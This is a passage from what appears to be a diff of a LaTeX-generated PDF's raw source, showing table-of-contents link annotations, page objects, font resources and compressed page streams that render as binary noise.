143.022 526.431] -/Subtype /Link -/A << /S /GoTo /D (subsection.1.5) >> ->> endobj -389 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 498.801 162.638 507.185] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.1.5.1) >> ->> endobj -390 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 480.025 162.638 488.408] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.1.5.2) >> ->> endobj -391 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 461.249 162.638 469.632] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.1.5.3) >> ->> endobj -392 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 442.472 162.638 450.856] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.1.5.4) >> ->> endobj -393 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 423.696 162.638 432.08] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.1.5.5) >> ->> endobj -394 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [71.004 394.96 130.31 403.828] -/Subtype /Link -/A << /S /GoTo /D (section.2) >> ->> endobj -395 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [85.944 376.184 181.576 385.038] -/Subtype /Link -/A << /S /GoTo /D (subsection.2.1) >> ->> endobj -396 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [85.944 355.471 274.386 366.261] -/Subtype /Link -/A << /S /GoTo /D (subsection.2.2) >> ->> endobj -397 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [85.944 338.631 187.041 347.485] -/Subtype /Link -/A << /S /GoTo /D (subsection.2.3) >> ->> endobj -398 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [71.004 307.958 198.218 318.763] -/Subtype /Link -/A << /S /GoTo /D (section.3) >> ->> endobj -399 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [71.004 279.222 197.445 290.026] -/Subtype /Link -/A << /S /GoTo /D (section.4) >> ->> endobj -400 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [71.004 250.485 117.812 261.29] -/Subtype /Link -/A << /S /GoTo /D (section.5) >> ->> endobj -401 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [85.944 231.709 185.906 242.5] -/Subtype /Link -/A << /S /GoTo /D (subsection.5.1) >> ->> endobj -402 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [85.944 212.933 139.37 223.723] -/Subtype /Link -/A << /S /GoTo /D (subsection.5.2) >> ->> endobj -403 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 194.157 195.59 204.947] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.2.1) >> ->> endobj -404 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 175.38 360.819 186.171] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.2.2) >> ->> endobj -405 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 156.604 278.951 167.395] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.2.3) >> ->> endobj -406 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 137.828 349.074 148.619] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.2.4) >> ->> endobj -407 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 119.052 325.571 129.842] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.2.5) >> ->> endobj -408 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [85.944 100.276 145.623 111.066] -/Subtype /Link -/A << /S /GoTo /D (subsection.5.3) >> ->> endobj -409 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 83.436 266.916 92.29] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.3.1) >> ->> endobj -413 0 obj << -/D [378 0 R /XYZ 72 793.935 null] ->> endobj -414 0 obj << -/D [378 0 R /XYZ 72 760.449 null] ->> endobj -419 0 obj << -/D [378 0 R /XYZ 72 631.328 null] ->> endobj -411 0 obj << -/Font << /F17 415 0 R /F15 416 0 R /F18 417 0 R /F20 418 0 R /F21 420 0 R /F22 421 0 R >> -/ProcSet [ /PDF /Text ] ->> endobj -462 0 obj << -/Length 1583 -/Filter /FlateDecode ->> -stream -xÚí[I{›:ÝûW°´¿ï™¢-3öµ_›qWmª­8¼bp%œáß? !¡n3y0Ÿs‡s¯”À›z÷º÷«Ì1ð€Ç Çxàνñ¬÷õ{àMÌõ·^àcz—Ũ™‡ihŽ±wÚûÔÛõ^CàqŸSH½Ñ™}ò9"Þhâ}í|8ŒNßGo_²2SäÐ<«ó½À½”}!5uoöùuÏbH|À€9A>ÆÜÞF|äÃÁŒûÿŽFí<®Ìc¦ aXÎs¦?#Ùð:û”“rع©ÖÞÉû:daÐ÷CÜó€9ït_×Øo ïÃvÒx舼!}Æè’3tξh©†{S™d ¼âSnç ? +k¢FŽP+Gf˜¯“„ïCÒgy&•…~Ó³Ì)Ä·3 yB@ou¾FÖp;kòuÖˆcíè*Sb0DYͶè@_™A}]còg®ºÎW#&5>iã#¨Aïã>ûBGãçÔ˜–£þizŽ„Õ€Ãh*uÖšÞD2ix’‰ˆ²rÌÉèÝû¦Â>DÕ ±ÈÎe2€a?‹Æ"‹ÒD׃/¤Ìd]Ž´»Ã>"e dK¦Ù*Ó…ÇH•Eß„ (Ò^*¡b9TƤ -´6_…6aõ”ý±jÚÁ›ÂÆs•æ†w•‡²ëšTãÏ:N=V¸cå MÆ ¥\(ØÌ:JþZ˜°T ”ƒZs -ë6CjÀ>”±Èq¾¶èF&˜$öTËqšL´ÅÿÇ`hÉ,z™ÿ‘2±ßH1Î?ŸÛ›–åxÚ|c€GÍA£5wX€OWaÌR S¡ˆ²5pÏRåÂ{ÍdºpßšÛ9n -ð>%‰õ{È®dH-²ïÅU4Ë\Ì,REB\—¤Ê~‘ž•6™©H:..Ï¥³t“K×£Ì諌ԢN†ÖôÂ.¦‡,@ÇQœI%S÷„šÊLÛß|¦ÒÙZ껈&r²r…õ¯®íÇ8uXèêYJN±pðÊ«yQäÅ€.Š<ŒÔí•3òÇÅu+^C}Ô*Ô¼> ì¿Iþ»ÁÙ8y5ËÃ&²VònàÎN:Œ¡1G‰±sé¹Pb&| H ÍPSw½TF·qpÕ6=ÎñOÕ¸Ìce`C‰ÐîÓL$b*g+ϨkÉ2ŽÆj§ø½³®º™Û2»Dh*Ä2v·BÍð_ ì­ì&,tV汨ŠÜÎñóv§bRóxÀ_vyÖ ó²ø±Ð®SY -¥™ ±‘nh?`¶Ëx-DЪ);ŽǃvŽ>¶¢Ò–4ÙášFõV|imq„;*E┢Õ¶øM¢¼Ø­ë]ôMø‘wÐÛy[£­Ê¬¤&­g˜ªÛyPf;?s)K!Cë²bÌ%¤-8ã,š— -³¨x2‘§TSYÿ²BÓ~½˜[×LUƒÛñ‡£¯›SÔâ©Äß ¸æ¥³ësÙ2±åG%âÓOï6øf¾&èy,r#Ò^t;¼_NÞ|8Y«ë㵃ŠxŽûíq)'¿èMµ]¡‹—èÞÅdŸz&mD—uLšÔ%ÍcS…H5W‘+X6Ûiìš%Û^ÄA·ŒI«Œyte„£Ž.ŠÆ¿õ†¶2t½ÌÌ5é’øŠ zÌM‘vo°{æìþ(±ê¢oèŒl×2ÜšŠÁ¸[‘U¿/’¤¾±ˆ‡dÇÄœéþ"“U"óTj]õxºN¾e÷׎«Ûh!hAU#nmÁ~%?lÒƒÈ.Òm ¶d¢Ô°‡23’ÔÉÓ³59›¯éozç -\Ñ”ÛÅd%‘ÎLæ*kŽ¼>ÜßkZMá€>@zîbºd)úU½uó{Ë /Ø®ù¡ø¡kü¸~¦Ö—¹~L•kœ }^o¼ámîz · ü¬~]D±œ6NàÎîHë@F¹aqo`žÑ¿ÚQ¼\å.#v}6g;bn¤‚wȳå.Åà -r·¹ÆÑ°)ïdÎÊ|M ý»³°Z¨•ÛפÊʾq/fõ äl÷O!…é“Í…ÇõãѨ÷?¦£?° -endstream -endobj -461 0 obj << -/Type /Page -/Contents 462 0 R -/Resources 460 0 R -/MediaBox [0 0 595.276 841.89] -/Parent 422 0 R -/Annots [ 410 0 R 423 0 R 424 0 R 425 0 R 426 0 R 427 0 R 428 0 R 429 0 R 430 0 R 431 0 R 432 0 R 433 0 R 434 0 R 435 0 R 436 0 R 437 0 R 438 0 R 439 0 R 440 0 R 441 0 R 442 0 R 443 0 R 444 0 R 445 0 R 446 0 R 447 0 R 448 0 R 449 0 R 450 0 R 451 0 R 452 0 R 453 0 R 454 0 R 455 0 R 456 0 R 457 0 R 458 0 R ] ->> endobj -410 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 749.49 238.17 758.344] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.3.2) >> ->> endobj -423 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 728.501 259.086 739.568] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.3.3) >> ->> endobj -424 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 711.938 243.399 720.792] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.3.4) >> ->> endobj -425 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 693.162 235.514 702.016] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.3.5) >> ->> endobj -426 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 672.172 351.937 683.239] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.3.6) >> ->> endobj -427 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 655.609 286.2 664.463] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.3.7) >> ->> endobj -428 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 634.896 199.325 645.687] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.3.8) >> ->> endobj -429 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 616.12 262.296 626.911] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.3.9) >> ->> endobj -430 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 597.344 342.669 608.135] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.3.10) >> ->> endobj -431 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 580.504 327.895 589.358] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.3.11) >> ->> endobj -432 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 561.728 430.789 570.582] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.3.12) >> ->> endobj -433 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 541.015 429.931 551.806] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.3.13) >> ->> endobj -434 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [85.944 522.239 149.026 533.03] -/Subtype /Link -/A << /S /GoTo /D (subsection.5.4) >> ->> endobj -435 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 502.909 238.336 514.862] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.4.1) >> ->> endobj -436 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 484.687 342.807 495.477] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.4.2) >> ->> endobj -437 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 465.91 420.414 476.701] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.4.3) >> ->> endobj -438 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 447.134 254.272 457.925] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.4.4) >> ->> endobj -439 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 428.358 216.257 439.149] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.4.5) >> ->> endobj -440 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 409.582 270.734 420.372] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.4.6) >> ->> endobj -441 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [85.944 390.806 158.765 401.596] -/Subtype /Link -/A << /S /GoTo /D (subsection.5.5) >> ->> endobj -442 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 371.476 379.134 383.429] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.5.1) >> ->> endobj -443 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 353.253 315.915 364.044] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.5.2) >> ->> endobj -444 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 334.477 304.82 345.268] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.5.3) >> ->> endobj -445 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 315.701 303.962 326.491] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.5.4) >> ->> endobj -446 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [85.944 296.924 160.286 307.715] -/Subtype /Link -/A << /S /GoTo /D (subsection.5.6) >> ->> endobj -447 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 278.148 366.684 288.939] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.6.1) >> ->> endobj -448 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [85.944 261.309 167.176 270.163] -/Subtype /Link -/A << /S /GoTo /D (subsection.5.7) >> ->> endobj -449 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 242.533 174.148 251.387] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.7.1) >> ->> endobj -450 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 223.756 194.926 232.61] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.7.2) >> ->> endobj -451 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 204.98 218.36 213.834] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.7.3) >> ->> endobj -452 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 183.714 407.272 195.667] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.7.4) >> ->> endobj -453 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 167.428 166.373 176.282] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.7.5) >> ->> endobj -454 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 146.715 241.047 157.506] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.7.6) >> ->> endobj -455 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 127.939 210.447 138.729] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.7.7) >> ->> endobj -456 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 111.099 227.49 119.953] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.7.8) >> ->> endobj -457 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 92.323 215.787 101.177] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.7.9) >> ->> endobj -458 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 73.547 246.719 82.401] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.7.10) >> ->> endobj -463 0 obj << -/D [461 0 R /XYZ 72 793.935 null] ->> endobj -460 0 obj << -/Font << /F21 420 0 R /F15 416 0 R /F22 421 0 R >> -/ProcSet [ /PDF /Text ] ->> endobj -496 0 obj << -/Length 1811 -/Filter /FlateDecode ->> -stream -xÚíZKw›8ÞûW°|Θ"Í®mšžôLÛi“Nm2–m&\Mòïç -]H“0§i“ÌÆ#$ñÝ«û݇\ke¹ÖËÉ× «k+ô¬»áÜŠ7“O_\kÿ¿²\‡òÈ:kzm,DpM­ãɻɳ“É“CXÜáX'K=†ïpŸY' ë“Mœé,âÔ>ʦ¾gWE>ÁuQÇU’gÓ/'¯ž¶ó> |Çõ`‚æm_õ˜¸¸R½Êb…Ë}ÿrbͨÇhø¥\¿ÆœÐ!d: (µêÍæô}{!*1¥TwÔ†v*õ™M½Ö–Èro>ë,ݳá (çêÂ\÷n.w5_çk !Üfô:Ð]kF"' ƒ´½.Ú"M÷`ŸÎˆ-§Ä.wà/¯Åß 5Èþã|ƒˆ‡c÷5â/Îe\W¨Éq]VùF·âïþÔ7e%*¹A »‹ð#roñ¼5ÖüZ“âywyñàt=ÏþPÊb¶Ÿ]Ÿfr¡Ñ]Ö™¶gÍ]’ý#[ó¶»N‚‡e>n0_Ožk`Øub¸B -˜uB¨"…r_íëž|h+´7Ÿ]æ~88„ é®qv_5;`·ÓìÐ`ÊQ³CˆåE Öíx˲g—yHòþ)㟷Šÿ^ -4;¨³OSôj–…ÙÕZöÝ­,¾M½Ð–Åoe÷õVð½Má?dÝ>¨‚úqùv‘EdSðV0c‘ö¡2Öq¦ƒ8Gƒ8Ó«pfä§+ò ²ÑHÎ$. –åí¶ÁQ¢J²ÕMm ó£ÇÓcEÃÇ™â:dÀÅ<© -Q\h5Í•ÜÂ]¹Ñ=¹Åùf#²Eߟ¤÷=ùM­G¸ƒ!F=ÕÝ¢/²Ì ”@‘×Õ,_Îæ -(­ùk™¦¿ëökYÉb[¨_ìoÿýæy/uÉσu³ÝÚâf·¼ÍLÌ’&±²”§ú÷},ý],UT32_šÖ\542Õy3 ²?2#ä-kÈÇ H1ÖÞ'œ*/Œ¿»Uiظ±\ÔRÎZßb;Û Å±÷¼jò[l”,ºà–+oá õómš'½ø‘QÿîÓ‘7–”ˆ&¥I¶h>ö S…\%*AѨ˜6WQS@¢GÉÝZ@þHj"†š:ž.íŠÌoDVVFV§c‹7ߦ,°EZË;Þê}#†Ç†½àÁ²‡z„¨Ó«Qç^tßwÅP*#º}²àF -<©Æ:ü®†ƒ‘ºè9CZý@sx:²æÓú+S -½ªU®Õ0ÁÑ›£½ÚAg™”‡å×ó1l¢_¯‘ TÍ,Ïf‰&NYˆ¸Jv—¶F‹hÃG°O†„À½1ji!KtùðîÊH{ârXøuÙ˜Îé¹™:¯Ü€}L -÷˜}ÑS*ÀeéeÃh`ŽÌµSœ•ÃžztÜC¡ýi]­ó¢¼Áаd‘:> ¼fÍí°ÔupÉM­PQ§þžú#ß9õç6k -|<¿‡Ü2;)õU•Ô5GýÀÛ2¯‹Xê¶yáQõo%K]½jnÐýHñv-*¾®råâl­Þ6ã¶éô²y4þ¢z²•:êcFo4R50Q®ÀÇ6;Æw?ï¸9•Å¢“BpË••g¢M´Ás­á𤧺6é!LÐã?KÝk.t!e&õ{ÑnMž_Ö¤K¥µ ŸG•îç›æ0t:Kª5ή/My¥ÈYˆ¬ñµvæ]JQՅΘt¿5ˆ¾Æ ØîÂàÿæ°ÎJÕhÐRêvÒ½r„îŒq¤Nb²f`]–Çîj&O)€z®óúí‹ØÙµ‚N»¡EzÑ>¿$àîîÕ±M,Ïû¥«U aõ+¦åà¿UîáB9µ¿%⊢bœg™Ö¥ÒéØ}}q2ùÇ L -endstream -endobj -495 0 obj << -/Type /Page -/Contents 496 0 R -/Resources 494 0 R -/MediaBox [0 0 595.276 841.89] -/Parent 422 0 R -/Annots [ 459 0 R 464 0 R 465 0 R 466 0 R 467 0 R 468 0 R 469 0 R 470 0 R 471 0 R 472 0 R 473 0 R 474 0 R 475 0 R 476 0 R 477 0 R 478 0 R 479 0 R 480 0 R 481 0 R 482 0 R 483 0 R 484 0 R 485 0 R 486 0 R 487 0 R 488 0 R 489 0 R 490 0 R 491 0 R ] ->> endobj -459 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 747.553 268.05 758.344] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.7.11) >> ->> endobj -464 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 728.777 289.741 739.568] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.7.12) >> ->> endobj -465 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 710.001 280.888 720.792] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.7.13) >> ->> endobj 466 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [85.944 691.225 244.561 702.016] /Subtype /Link -/A << /S /GoTo /D (subsection.5.8) >> +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [71.004 611.458 151.087 620.326] +/A << /S /GoTo /D (section.1) >> >> endobj 467 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 671.895 332.985 683.848] /Subtype /Link -/A << /S /GoTo /D (subsubsection.5.8.1) >> +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [85.944 590.745 170.274 601.536] +/A << /S /GoTo /D (subsection.1.1) >> >> endobj 468 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [85.944 653.672 189.78 664.463] /Subtype /Link -/A << /S /GoTo /D (subsection.5.9) >> +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [85.944 573.906 147.393 582.76] +/A << /S /GoTo /D (subsection.1.2) >> >> endobj 469 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 634.896 356.253 645.687] /Subtype /Link -/A << /S /GoTo /D (subsubsection.5.9.1) >> +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 553.193 295.441 563.984] +/A << /S /GoTo /D (subsubsection.1.2.1) >> >> endobj 470 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 616.12 372.162 626.911] /Subtype /Link -/A << /S /GoTo /D (subsubsection.5.9.2) >> +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 534.417 381.818 545.207] +/A << /S /GoTo /D (subsubsection.1.2.2) >> >> endobj 471 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [85.944 597.344 217.336 608.135] /Subtype /Link -/A << /S /GoTo /D (subsection.5.10) >> +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [85.944 515.641 158.765 526.431] +/A << /S /GoTo /D (subsection.1.3) >> >> endobj 472 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 578.568 342.835 589.358] /Subtype /Link -/A << /S /GoTo /D (subsubsection.5.10.1) >> +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [85.944 498.801 136.161 507.655] +/A << /S /GoTo /D (subsection.1.4) >> >> endobj 473 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 559.791 377.419 570.582] /Subtype /Link -/A << /S /GoTo /D (subsubsection.5.10.2) >> +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [71.004 470.065 130.31 478.932] +/A << /S /GoTo /D (section.2) >> >> endobj 474 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 541.015 419.058 551.806] /Subtype /Link -/A << /S /GoTo /D (subsubsection.5.10.3) >> +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [85.944 451.288 181.576 460.142] +/A << /S /GoTo /D (subsection.2.1) >> >> endobj 475 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 522.239 410.979 533.03] /Subtype /Link -/A << /S /GoTo /D (subsubsection.5.10.4) >> +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [85.944 430.575 274.386 441.366] +/A << /S /GoTo /D (subsection.2.2) >> >> endobj 476 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [85.944 503.463 216.534 514.253] /Subtype /Link -/A << /S /GoTo /D (subsection.5.11) >> +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [85.944 413.736 187.041 422.59] +/A << /S /GoTo /D (subsection.2.3) >> >> endobj 477 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 484.687 296.575 495.477] /Subtype /Link -/A << /S /GoTo /D (subsubsection.5.11.1) >> +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [71.004 383.063 125.545 393.867] +/A << /S /GoTo /D (section.3) >> >> endobj 478 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 465.91 298.678 476.701] /Subtype /Link -/A << /S /GoTo /D (subsubsection.5.11.2) >> +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [85.944 366.223 130.765 374.607] +/A << /S /GoTo /D (subsection.3.1) >> >> endobj 479 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 447.134 276.101 457.925] /Subtype /Link -/A << /S /GoTo /D (subsubsection.5.11.3) >> +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [85.944 347.447 130.765 355.831] +/A << /S /GoTo /D (subsection.3.2) >> >> endobj 480 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 428.358 258.892 439.149] /Subtype /Link -/A << /S /GoTo /D (subsubsection.5.11.4) >> +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [85.944 328.671 130.765 337.055] +/A << /S /GoTo /D (subsection.3.3) >> >> endobj 481 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [85.944 411.518 170.44 420.372] /Subtype /Link -/A << /S /GoTo /D (subsection.5.12) >> +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [85.944 309.895 130.765 318.278] +/A << /S /GoTo /D (subsection.3.4) >> >> endobj 482 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 392.742 346.376 401.596] /Subtype /Link -/A << /S /GoTo /D (subsubsection.5.12.1) >> +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [85.944 291.119 130.765 299.502] +/A << /S /GoTo /D (subsection.3.5) >> >> endobj 483 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 372.029 295.081 382.82] /Subtype /Link -/A << /S /GoTo /D (subsubsection.5.12.2) >> +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [85.944 272.342 130.765 280.726] +/A << /S /GoTo /D (subsection.3.6) >> >> endobj 484 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 355.19 252.529 364.044] /Subtype /Link -/A << /S /GoTo /D (subsubsection.5.12.3) >> +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [71.004 241.669 198.218 252.474] +/A << /S /GoTo /D (section.4) >> >> endobj 485 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 334.477 369.99 345.268] /Subtype /Link -/A << /S /GoTo /D (subsubsection.5.12.4) >> +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [71.004 212.933 117.812 223.737] +/A << /S /GoTo /D (section.5) >> >> endobj 486 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 315.701 208.898 326.491] /Subtype /Link -/A << /S /GoTo /D (subsubsection.5.12.5) >> +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [85.944 194.157 185.906 204.947] +/A << /S /GoTo /D (subsection.5.1) >> >> endobj 487 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 296.924 311.571 307.715] /Subtype /Link -/A << /S /GoTo /D (subsubsection.5.12.6) >> +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [85.944 175.38 139.37 186.171] +/A << /S /GoTo /D (subsection.5.2) >> >> endobj 488 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 280.085 265.035 288.939] /Subtype /Link -/A << /S /GoTo /D (subsubsection.5.12.7) >> +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 156.604 195.59 167.395] +/A << /S /GoTo /D (subsubsection.5.2.1) >> >> endobj 489 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 258.819 403.288 270.771] /Subtype /Link -/A << /S /GoTo /D (subsubsection.5.12.8) >> +/Border[0 0 